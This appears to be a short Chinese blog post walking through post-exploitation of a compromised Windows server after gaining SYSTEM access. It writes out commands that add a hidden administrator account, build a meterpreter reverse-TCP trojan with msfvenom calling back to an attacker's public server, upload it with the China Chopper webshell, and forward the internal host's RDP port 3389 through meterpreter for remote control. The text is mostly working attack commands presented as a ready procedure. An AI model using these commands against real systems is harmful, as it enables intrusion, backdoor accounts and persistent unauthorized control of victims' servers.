在上次getshell之后,已经是system的权限啦。想要控制服务器。最直接的方式是添加用户,开3389。
添加用户
oknet user admintest 1234qwer.. /add
net localgroup administrators admintest /add
想要远程也容易,只是这台服务器在内网。
192.168.1.18t所以需要端口映射。
推荐文章:http://www.sqlsec.com/2018/03/cloud.html#more
打造一台外网meterpreter,使用msf马反弹shell,进行端口的转发。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2333 -f exe > road.exe
xx.xx.xx.xx为公网服务器,2333为公网出端口。
road.exe木马将生成的msf马通过中国菜刀上传到内网服务器,触发反弹shell
ok meterpreteruse exploit/multi/handle
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
run
meterpreter的命令简单应用
getuid 当前权限
getsystem 进行提取
run getgui -u xxxxx -p xxxxx 可以在目标机器上添加用户
portfwd add -l 3389 -r 192.168.1.18 -p 3389 将3389端口转发至本地
现在就可以远程连接本地的3389端口。
错误出现身份错误。
ok success
网友评论